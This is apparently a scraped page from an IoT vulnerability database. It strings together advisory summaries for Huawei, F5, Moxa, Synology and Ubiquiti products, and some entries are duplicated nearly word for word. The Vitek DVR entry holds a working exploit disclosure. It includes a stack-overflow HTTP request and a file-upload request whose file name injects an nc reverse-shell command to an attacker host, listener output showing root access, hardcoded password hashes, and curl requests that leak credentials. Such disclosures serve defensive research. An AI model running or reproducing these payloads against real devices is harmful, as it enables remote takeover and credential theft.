VARIoT IoT vulnerabilities database

Huawei AR120-S V200R005C32, V200R006C10, V200R007C00, V200R008C20, AR1200 V200R005C20, V200R005C32, V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, AR1200-S V200R005C32, V200R006C10, V200R007C00, V200R008C20, AR150 V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, AR160 V200R005C32, V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, AR200 V200R005C32, V200R006C10, V200R007C00, V200R007C01, V200R008C20, AR200-S V200R005C32, V200R006C10, V200R007C00, V200R008C20, AR2200 V200R005C20, V200R005C32, V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, AR2200-S V200R005C32, V200R006C10, V200R007C00, V200R008C20, AR3200 V200R005C32, V200R006C10, V200R006C11, V200R007C00, V200R007C01, V200R007C02, V200R008C00, V200R008C10, V200R008C20, V200R008C30, AR3600 V200R006C10, V200R007C00, V200R007C01, V200R008C20, AR510 V200R005C32, V200R006C10, V200R007C00, V200R008C20, CloudEngine 12800 V100R003C00, V100R003C10, V100R005C00, V100R005C10, V100R006C00, V200R001C00, CloudEngine 5800 V100R003C00, V100R003C10, V100R005C00, V100R005C10, V100R006C00, V200R001C00, CloudEngine 6800 V100R003C00, V100R003C10, V100R005C00, V100R005C10, V100R006C00, V200R001C00, CloudEngine 7800 V100R003C00, V100R003C10, V100R005C00, V100R005C10, V100R006C00, V200R001C00, DP300 V500R002C00, SMC2.0 V100R003C10, V100R005C00, V500R002C00, SRG1300 V200R005C32, V200R006C10, V200R007C00, V200R007C02, V200R008C20, SRG2300 V200R005C32, V200R006C10, V200R007C00, V200R007C02, V200R008C20, SRG3300 V200R005C32, V200R006C10, V200R007C00, V200R008C20, TE30 V100R001C10, TE60 V100R003C00, V500R002C00, VP9660 V200R001C02, V200R001C30, V500R002C00, ViewPoint 8660 V100R008C02, V100R008C03, eSpace IAD V300R002C01, eSpace U1981 V200R003C20, V200R003C30, eSpace USM V100R001C01, V300R001C00 have a weak cryptography vulnerability. Due to not properly some values in the certificates, an unauthenticated remote attacker could forges a specific RSA certificate and exploits the vulnerability to pass identity authentication and logs into the target device to obtain permissions configured for the specific user name. plural Huawei The product contains cryptographic vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Huawei AR120-S is a router product of China Huawei. A weak encryption algorithm vulnerability exists in several Huawei products because the program failed to correctly parse the value in the certificate. A remote attacker can exploit this vulnerability to forge an RSA signature with a specially crafted certificate. There are security vulnerabilities in several Huawei products. The following products and versions are affected: Huawei AR120-S V200R005C32 Version, V200R006C10 Version, V200R007C00 Version, V200R008C20 Version; AR1200 V200R005C20 Version, V200R005C32 Version, V200R006C10 Version, V200R007C00 Version, V200R007C01 Version, V200R007C02 Version, V200R008C20 Version; AR1200-S V200R005C32 Version , V200R006C10 version, V200R007C00 version, V200R008C20; AR150, etc

The CIDAM Protocol on some Huawei Products has multiple input validation vulnerabilities due to insufficient validation of specific messages when the protocol is implemented. An authenticated remote attacker could send a malicious message to a target system. Successful exploit could allow the attacker to tamper with business and make the system abnormal. Affected Huawei Products are: DP300 versions V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00B012, V500R002C00B013, V500R002C00B014, V500R002C00B017, V500R002C00B018, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC400, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00; RP200 versions V500R002C00SPC200, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE30 versions V100R001C10SPC300, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700B010, V500R002C00SPC200, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE40 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE50 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE60 versions V100R001C10, V100R001C10B001, V100R001C10B002, V100R001C10B010, V100R001C10B011, V100R001C10B012, V100R001C10B013, V100R001C10B014, V100R001C10B016, V100R001C10B017, V100R001C10B018, V100R001C10B019, V100R001C10SPC400, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700, V100R001C10SPC800B011, V100R001C10SPC900, V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00, V500R002C00SPCb00, V500R002C00SPCd00, V500R002C00SPCe00, V600R006C00, V600R006C00SPC100, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; eSpace U1981 version V200R003C20SPC900. plural Huawei The product contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Huawei DP300 is a video conferencing terminal of China's Huawei company. CIDAM is one of the information transmission protocols. A remote attacker can exploit the vulnerability by sending maliciously constructed information to the target device to cause a denial of service (destroying normal business and system anomalies)

The CIDAM Protocol on some Huawei Products has multiple input validation vulnerabilities due to insufficient validation of specific messages when the protocol is implemented. An authenticated remote attacker could send a malicious message to a target system. Successful exploit could allow the attacker to tamper with business and make the system abnormal. Affected Huawei Products are: DP300 versions V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00B012, V500R002C00B013, V500R002C00B014, V500R002C00B017, V500R002C00B018, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC400, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00; RP200 versions V500R002C00SPC200, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE30 versions V100R001C10SPC300, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700B010, V500R002C00SPC200, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE40 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE50 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE60 versions V100R001C10, V100R001C10B001, V100R001C10B002, V100R001C10B010, V100R001C10B011, V100R001C10B012, V100R001C10B013, V100R001C10B014, V100R001C10B016, V100R001C10B017, V100R001C10B018, V100R001C10B019, V100R001C10SPC400, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700, V100R001C10SPC800B011, V100R001C10SPC900, V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00, V500R002C00SPCb00, V500R002C00SPCd00, V500R002C00SPCe00, V600R006C00, V600R006C00SPC100, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; eSpace U1981 version V200R003C20SPC900. Huawei DP300 Contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Huawei DP300 is a video conferencing terminal of China's Huawei company. CIDAM is one of the information transmission protocols. A remote attacker can exploit the vulnerability by sending maliciously constructed information to the target device to cause a denial of service (destroying normal business and system anomalies)

The CIDAM Protocol on some Huawei Products has multiple input validation vulnerabilities due to insufficient validation of specific messages when the protocol is implemented. An authenticated remote attacker could send a malicious message to a target system. Successful exploit could allow the attacker to tamper with business and make the system abnormal. Affected Huawei Products are: DP300 versions V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00B012, V500R002C00B013, V500R002C00B014, V500R002C00B017, V500R002C00B018, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC400, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00; RP200 versions V500R002C00SPC200, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE30 versions V100R001C10SPC300, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700B010, V500R002C00SPC200, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE40 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE50 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE60 versions V100R001C10, V100R001C10B001, V100R001C10B002, V100R001C10B010, V100R001C10B011, V100R001C10B012, V100R001C10B013, V100R001C10B014, V100R001C10B016, V100R001C10B017, V100R001C10B018, V100R001C10B019, V100R001C10SPC400, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700, V100R001C10SPC800B011, V100R001C10SPC900, V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00, V500R002C00SPCb00, V500R002C00SPCd00, V500R002C00SPCe00, V600R006C00, V600R006C00SPC100, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; eSpace U1981 version V200R003C20SPC900. Huawei DP300 Contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Huawei DP300 is a video conferencing terminal of China's Huawei company. CIDAM is one of the information transmission protocols. A remote attacker can exploit the vulnerability by sending maliciously constructed information to the target device to cause a denial of service (destroying normal business and system anomalies)

VitekVT-HDOC16BR is Vitek's all-in-one recorder for EX-SDI, TVI, AHD, CVI, IP and Analog (CVBS). There are remote code execution vulnerabilities and information disclosure vulnerabilities in VitekVT-HDOC16BR. An attacker could exploit this vulnerability to execute arbitrary remote code and obtain sensitive information in the context of an affected application. [STX] Subject: Vitek RCE and Information Disclosure (and possible other OEM) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 22, 2017 Full Disclosure: 0-day heap: Executable + Non-ASLR stack: Executable + ASLR -[Manufacture Logo]- _ _ _ _ _ _ _ _ _ _ _ _ \ _ _ _ _ _ ___ / /__/ \ |_/ / __ / - _ ___ / / / / / / _ _ _ _/ / / \_/ \_ ______ ___________\___\__________________ -[OEM (found in the code)]- Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R Thrive Wisecon Sanyo Inodic CBC Elbex Y3K KTNC -[Stack Overflow RCE]- [Reverse netcat shell] $ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81 [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:36356. pwd /opt/fw whoami root exit $ Note: 1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20 2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4] 3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0 H1: VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6 .rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001CD138 SUB R3, R11, #0x74 .text:001CD13C MOV R0, R3 .text:001CD140 BL system H4: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R .rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:00114AC8 SUB R3, R11, #0x74 .text:00114ACC MOV R0, R3 .text:00114AD0 BL system N1: VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6 .rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001E9F0C SUB R3, R11, #0x74 .text:001E9F10 MOV R0, R3 .text:001E9F14 BL system -[PHP RCE]- Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted) [Reverse netcat shell (forking)] $ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST 200 OK [...] > ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody> [...] [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:52726. pwd /opt/www/htdocs/system whoami nobody ls -l /mnt/usb2/ total 4 drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr -rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}|| exit $ -[Login / Password Disclosure]- curl -v "http://192.168.57.20:80/menu.env" | hexdump -C [binary config, login and password can be found for admin login and all connected cameras] Admin l/p [...] 00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................| 00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......| 000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12| 00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............| 00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| Cameras l/p [...] 00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................| 00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........| 00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........| 00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................| 00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root| 00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass| 00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| -[Hardcode l/p]- FTP: TCP/10021 TELNET: TCP/10023 /etc/passwd root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh -[Korean hardcoded DNS]- $ cat /etc/resolv.conf nameserver 168.126.63.1 nameserver 0.0.0.0 nameserver 0.0.0.0 $ $ nslookup 168.126.63.1 1.63.126.168.in-addr.arpa name = kns.kornet.net. $ nslookup 168.126.63.2 2.63.126.168.in-addr.arpa name = kns2.kornet.net. -[Other Information Disclosure]- curl -v "http://192.168.57.20:80/webviewer/netinfo.dat" 192,168,57,20 192,168,2,100 00:0A:2F:XX:XX:XX 00:0A:2F:YY:YY:YY 255.255.255.0 192.168.57.1 -[MAC Address Details]- Company: Artnix Inc. Address: Seoul 137-819, KOREA, REPUBLIC OF Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF Type: IEEE MA-L curl -v "http://192.168.57.20:80/webviewer/gw.dat" Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1 192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0 curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0" Change GUI Language to English [... and more] [ETX]

Huawei HG8245H version earlier than V300R018C00SPC110 has an authentication bypass vulnerability. An attacker can access a specific URL of the affect product. Due to improper verification of the privilege, successful exploitation may cause information leak. Huawei HG8245H Contains an information disclosure vulnerability.Information may be obtained. HuaweiHG8245H is a modem from China's Huawei company. An attacker could exploit the vulnerability to obtain information

Ubiquiti UniFi Video before 3.8.0 for Windows uses weak permissions for the installation directory, which allows local users to gain SYSTEM privileges via a Trojan horse taskkill.exe file. Ubiquiti UniFi Video Contains a permission vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. UbiquitiUniFiVideo is a network camera product from Ubiquiti Networks of the United States. A local privilege elevation vulnerability exists in UbiquitiUniFiVideo. A local attacker could exploit this vulnerability to execute arbitrary code with elevated privileges. A security vulnerability exists in Ubiquiti UniFi Video versions earlier than 3.8.0 based on the Windows platform. The vulnerability is caused by the program assigning weak permissions to the installation path

An improper access control vulnerability in synodsmnotify in Synology DiskStation Manager (DSM) before 6.1.4-15217 and before 6.0.3-8754-6 allows local users to inject arbitrary web script or HTML via the -fn option. Synology DiskStation Manager (DSM) Contains an injection vulnerability.Information may be obtained and information may be altered. Synology DiskStation Manager (DSM) is an operating system developed by Synology for network storage servers (NAS). The operating system can manage data, documents, photos, music and other information. Synology DSM versions earlier than 6.1.4-15217 and synodsmnotify in versions earlier than 6.0.3-8754-6 have an access control error vulnerability

A Credentials Management issue was discovered in Moxa NPort W2150A versions prior to 1.11, and NPort W2250A versions prior to 1.11. The default password is empty on the device. An unauthorized user can access the device without a password. An unauthorized user has the ability to completely compromise the confidentiality and integrity of the wireless traffic. Moxa NPort W2150A and NPort W2250A Contains vulnerabilities related to certificate and password management.Information may be obtained and information may be altered. Moxa's NPortW2150A and NPortW2250A are both serial communication servers used by Moxa to connect industrial serial devices to the network. This may lead to further attacks

In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator and WebSafe software version 13.0.0, 12.0.0 - 12.1.2, 11.6.0 - 11.6.1 and 11.5.0 - 11.5.4, in some circumstances, Traffic Management Microkernel (TMM) does not properly handle certain malformed TLS1.2 records, which allows remote attackers to cause a denial-of-service (DoS) or possible remote command execution on the BIG-IP system. plural F5 BIG-IP There is an input validation vulnerability in the product software.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. F5 BIG-IP LTM is a local traffic manager; BIG-IP AAM is an application acceleration manager. A security vulnerability exists in several F5 products. The vulnerability stems from the Traffic Management Microkernel (TMM) not properly handling malformed TLS1.2 records. A remote attacker could exploit this vulnerability to cause a denial of service or execute commands on the BIG-IP system. The following products and versions are affected: F5 BIG-IP LTM Release 13.0.0, Release 12.0.0 to Release 12.1.2, Release 11.6.0 to Release 11.6.1, Release 11.5.0 to Release 11.5.4; BIG-IP AAM 13.0.0, 12.0.0 to 12.1.2, 11.6.0 to 11.6.1, 11.5.0 to 11.5.4; BIG-IP AFM 13.0.0, 12.0.0 to Version 12.1.2, Version 11.6.0 to Version 11.6.1, Version 11.5.0 to Version 11.5.4; BIG-IP Analytics Version 13.0.0, Version 12.0.0 to Version 12.1.2, Version 11.6.0 to Version 11.6 .1 version, 11.5.0 to 11.5.4 version; BIG-IP APM version 13.0.0, 12.0.0 to 12.1.2 version, 11.6.0 to 11.6.1 version, 11.5.0 to 11.5 version. 4 version; BIG-IP ASM version 13.0.0, 12.0.0 to 12.1.2, 11.6.0 to 11.6.1, 11.5.0 to 11.5.4; BIG-IP DNS 13.0.0 , Version 12.0.0 to Version 12.1.2, Version 11.6.0 to Version 11.6.1, Version 11.5.0 to Version 11.5.4; BIG-IP Edge Gateway Version 13.0.0, Version 12.0.0 to Version 12.1.2 , 11.6.0 to 11.6.1, 11.5.0 to 11.5.4; BIG-IP GTM 13.0.0, 12.0.0 to 12.1.2, 11.6.0 to 11.6

In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Link Controller, PEM and WebSafe software version 13.0.0 and 12.1.0 - 12.1.2, race conditions in iControl REST may lead to commands being executed with different privilege levels than expected. plural F5 BIG-IP There is a race condition vulnerability in the product software.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. F5 BIG-IP LTM is a local traffic manager; BIG-IP AAM is an application acceleration manager. A race condition vulnerability exists in several F5 products. An attacker can exploit this vulnerability to execute commands with other privileges. The following products and versions are affected: F5 BIG-IP LTM Version 13.0.0 and Version 12.1.0 through Version 12.1.2; BIG-IP AAM Version 13.0.0 and Version 12.1.0 through Version 12.1.2; BIG-IP AFM Version 13.0.0 and 12.1.0 to 12.1.2; BIG-IP Analytics 13.0.0 and 12.1.0 to 12.1.2; BIG-IP APM 13.0.0 and 12.1.0 to 12.1. 2 version; BIG-IP ASM version 13.0.0 and 12.1.0 through 12.1.2; BIG-IP DNS version 13.0.0 and 12.1.0 through 12.1.2; BIG-IP Link Controller version 13.0.0 and 12.1.0 through 12.1.2; BIG-IP PEM version 13.0.0 and 12.1.0 through 12.1.2; BIG-IP WebSafe 13.0.0 and 12.1.0 through 12.1.2; BIG -IQ Centralized Management version 5.2.0 to version 5.3.0

IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset. plural Huawei The product contains an out-of-bounds vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Huawei Quidway S2700 and other Huawei S series switches are Huawei products. The following products and versions are affected: Huawei Quidway S2700 V200R003C00SPC300 Version; Quidway S5300 V200R003C00SPC300 Version; Quidway S5700 V200R003C00SPC300 Version; S2300 V200R003C00 Version, V200R003C00SPC300T Version, V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S2700 V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S5300 V200R003C00 Version, V200R003C00SPC300T Version, V200R003C00SPC600 Version, V200R003C02 Version, V200R005C00 Version, V200R005C01 Version, V200R005C02 Version, V200R005C03 Version, V200R005C05 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version ; S5700 etc

Huawei S12700 V200R008C00, V200R009C00, S5700 V200R007C00, V200R008C00, V200R009C00, S6700 V200R008C00, V200R009C00, S7700 V200R008C00, V200R009C00, S9700 V200R008C00, V200R009C00 have a numeric errors vulnerability. An unauthenticated, remote attacker may send specific TCP messages with keychain authentication option to the affected products. Due to the improper validation of the messages, it will cause numeric errors when handling the messages. Successful exploit will cause the affected products to reset. plural Huawei The product contains a numerical processing vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiS12700 is an intelligent routing switch of China Huawei. A numerical calculation error vulnerability exists in several Huawei router products. The vulnerability stems from a program that fails to adequately verify the message. There are security vulnerabilities in several Huawei products. The following products and versions are affected: Huawei S12700 V200R008C00 Version, V200R009C00 Version; S5700 V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S6700 V200R008C00 Version, V200R009C00 Version; S7700 V200R008C00 Version, V200R009C00 Version; S9700 V200R008C00 Version, V200R009C00 Version

The Flp Driver in some Huawei smartphones of the software Vicky-AL00AC00B124D, Vicky-AL00AC00B157D, Vicky-AL00AC00B167 has a double free vulnerability. An attacker can trick a user to install a malicious application which has a high privilege to exploit this vulnerability. Successful exploitation may cause denial of service (DoS) attack. Huawei Smartphone software contains a double release vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiVicky-AL00A is a smartphone device from China's Huawei company. Flpdriver is a Flp driver used in it. The following versions are affected: Huawei Vicky-AL00A Vicky-AL00AC00B124D version, Vicky-AL00AC00B157D version, Vicky-AL00AC00B167 version

Huawei DP300 V500R002C00; TP3206 V100R002C00; ViewPoint 9030 V100R011C02; V100R011C03 have a use of a broken or risky cryptographic algorithm vulnerability. The software uses risky cryptographic algorithm in SSL. This is dangerous because a remote unauthenticated attacker could use well-known techniques to break the algorithm. Successful exploit could result in the exposure of sensitive information. Huawei DP300, TP3206, and ViewPoint 9030 are products of China Huawei. The DP300 is a video conferencing terminal. The TP3206 is a panoramic video conferencing solution. The ViewPoint 9030 is a multipoint control unit for video conferencing systems. The vulnerability stems from the fact that devices support the use of weak encryption algorithm sets in SSL connections. Multiple Huawei Products are prone to an information-disclosure vulnerability. There are security vulnerabilities in Huawei DP300, TP3206, and ViewPoint 9030

The Common Open Policy Service Protocol (COPS) module in Huawei DP300 V500R002C00, IPS Module V100R001C10, V100R001C20, V100R001C30, V500R001C00, V500R001C20, V500R001C30, V500R001C50, NGFW Module V100R001C10, V100R001C20, V100R001C30, V500R001C00, V500R001C20, NIP6300 V500R001C00, V500R001C20, V500R001C30, V500R001C50, NIP6600 V500R001C00, V500R001C20, V500R001C30, V500R001C50, NIP6800 V500R001C50, RP200 V500R002C00, V600R006C00, SVN5600 V200R003C00, V200R003C10, SVN5800 V200R003C00, V200R003C10,SVN5800-C V200R003C00, V200R003C10, Secospace USG6300 V100R001C10, V100R001C20, V100R001C30, V500R001C00, V500R001C20, V500R001C30, V500R001C50, Secospace USG6500 V100R001C10, V100R001C20, V100R001C30, V500R001C00, V500R001C20, V500R001C30, V500R001C50, Secospace USG6600 V100R001C00, V100R001C20, V100R001C30, V500R001C00, V500R001C20, V500R001C30, V500R001C50, TE30 V100R001C02, V100R001C10, V500R002C00, V600R006C00, TE40 V500R002C00, V600R006C00, TE50 V500R002C00, V600R006C00, TE60 V100R001C01, V100R001C10, V500R002C00, V600R006C00, TP3206 V100R002C00, V100R002C10,USG9500 V500R001C00, V500R001C20, V500R001C30, V500R001C50 haa a buffer overflow vulnerability. An unauthenticated, remote attacker could exploit this vulnerability by sending specially crafted message to the affected products. The vulnerability is due to insufficient input validation of the message, which could result in a buffer overflow. Successful exploit may cause some services abnormal. plural Huawei The product contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Huawei DP300 and other products are all products of China Huawei. HuaweiDP300 is a video conferencing terminal. IPSModule is an intrusion prevention and intrusion detection product. NGFWModule is a firewall product. The vulnerability stems from the program failing to perform boundary detection on the data entered in the message. The following products and versions are affected: Huawei DP300 V500R002C00 Version; IPS 